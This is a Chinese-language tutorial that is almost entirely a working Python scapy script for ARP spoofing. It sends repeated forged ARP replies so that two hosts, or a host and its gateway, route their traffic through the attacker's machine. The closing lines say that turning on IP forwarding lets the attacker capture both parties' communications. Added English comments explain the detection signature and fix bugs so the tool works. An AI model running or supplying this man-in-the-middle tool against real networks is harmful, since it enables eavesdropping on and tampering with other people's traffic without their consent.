使用scapy 包发送ARP欺骗包,进行ARP欺骗
- 创建ARP包
import sys
import signal
from scapy.all import (
get_if_hwaddr,
getmacbyip,
ARP,
Ether,
sendp
)
from StaticTools import *
'''
Arp欺骗的主要函数代码
'''
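class Arp:
    """Send forged ARP replies to two hosts and restore their caches on SIGINT.

    Each of the two hosts is told that the other's IP address is reachable at
    this machine's MAC address. On the wire this appears as unsolicited ARP
    replies (op=2), repeated every few seconds, in which one MAC address
    claims two different IP addresses. That is the pattern ARP-cache
    monitoring and switch-level ARP inspection look for.
    """

    def __init__(self, directIP, sourdeIP):
        """Resolve the outgoing interface and the real MAC address of both hosts.

        Args:
            directIP: IP address of the first host (stored as ``self.direct``).
            sourdeIP: IP address of the second host (stored as ``self.source``).
        """
        # Name of the interface that carries the default IPv4 route.
        # NOTE(review): netifaces is not imported in this file; presumably it
        # arrives through ``from StaticTools import *`` -- confirm.
        self.interface = netifaces.gateways()['default'][netifaces.AF_INET][1]
        # self.host = NetTools.getGateway_ip()  # gateway IP
        self.source = sourdeIP
        self.direct = directIP  # target IP
        self.mac = get_if_hwaddr(self.interface)
        # The genuine MAC addresses are looked up here, before any forged reply
        # is sent, because __rearp needs them to rebuild the correct bindings.
        # getmacbyip() returns None when the host does not answer.
        self.source_mac = getmacbyip(self.source)
        self.direct_mac = getmacbyip(self.direct)
        self.reverse = True

    def arpSpoofing(self):
        """Install the SIGINT restore handler, then resend both forged replies until interrupted."""
        # Local import: the file's import block does not bring in ``time``.
        import time

        # Ctrl-C must run the restore routine; otherwise both hosts keep the
        # forged bindings until their ARP cache entries expire.
        signal.signal(signal.SIGINT, self.__rearp)
        source_pkt = self.__build_req(self.direct, self.source)
        direct_pkt = self.__build_req(self.source, self.direct)
        while True:
            sendp(source_pkt, inter=2, iface=self.interface)
            sendp(direct_pkt, inter=2, iface=self.interface)
            time.sleep(2)

    def __build_req(self, target, host):
        """Build an ARP frame that advertises ``host``'s IP at this machine's MAC.

        Args:
            target: IP address of the host that receives the frame, or None to
                broadcast it.
            host: IP address placed in the ARP sender-protocol field.

        Returns:
            The scapy ``Ether / ARP`` packet.

        Raises:
            ValueError: if ``target`` is falsy but not None (the original fell
                through to ``return pkt`` with ``pkt`` unbound).
        """
        if target is None:
            # Broadcast form; no op is set here, so scapy's default applies.
            return Ether(src=self.mac, dst='ff:ff:ff:ff:ff:ff') / ARP(hwsrc=self.mac, psrc=host, pdst=host)
        if not target:
            raise ValueError("target must be an IP address or None")
        target_mac = getmacbyip(target)
        if target_mac is None:
            print("Could not resolve targets MAC address")
            sys.exit(1)
        # Unicast ARP reply (op=2) addressed to the target.
        return Ether(src=self.mac, dst=target_mac) / ARP(
            hwsrc=self.mac, psrc=host, hwdst=target_mac, pdst=target, op=2)

    def __rearp(self, signum=None, frame=None):
        """SIGINT handler: re-announce the genuine IP-to-MAC bindings, then exit.

        Python calls signal handlers with ``(signum, frame)``. The original
        signature accepted neither, so Ctrl-C raised TypeError and the restore
        packets were never sent. Both parameters are optional so a direct call
        without arguments still works.
        """
        # NOTE(review): psrc is an IP-address field but is given a MAC string
        # here; the intended value is not visible in this file -- confirm.
        pkt = Ether(src=self.mac, dst='ff:ff:ff:ff:ff:ff') / ARP(psrc=self.mac, hwsrc=self.mac, op=2)
        sendp(pkt, inter=1, count=5, iface=self.interface)
        if self.reverse:
            if self.source_mac is None or self.direct_mac is None:
                # With a missing MAC, scapy would fill in its own defaults and
                # the "restore" frames would not carry the genuine bindings.
                print("Could not resolve original MAC addresses; caches not restored")
            else:
                r_pkt = Ether(src=self.direct_mac, dst=self.source_mac) / ARP(
                    hwsrc=self.direct_mac, psrc=self.direct,
                    hwdst=self.source_mac, pdst=self.source, op=2)
                sendp(r_pkt, inter=1, count=5, iface=self.interface)
                d_pkt = Ether(src=self.source_mac, dst=self.direct_mac) / ARP(
                    hwsrc=self.source_mac, psrc=self.source,
                    hwdst=self.direct_mac, pdst=self.direct, op=2)
                sendp(d_pkt, inter=1, count=5, iface=self.interface)
        sys.exit(0)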
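if __name__ == "__main__":
    # Two positional arguments are required: directIP, then sourdeIP, in the
    # order Arp.__init__ takes them.
    args = sys.argv
    if len(args) < 3:
        # Without this check a missing argument surfaced as a bare IndexError.
        print("usage: %s <directIP> <sourceIP>" % args[0])
        sys.exit(2)
    arps = Arp(args[1], args[2])
    # arps = Arp("192.168.1.2", "192.168.1.3")
    arps.arpSpoofing()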
对于局域网内通信,运行时,输入双向欺骗目标。
对于局域网内目标和外部通信,运行时输入欺骗目标和网关地址
在ARP欺骗的同时,开启路由转发,即可获取双方通信内容。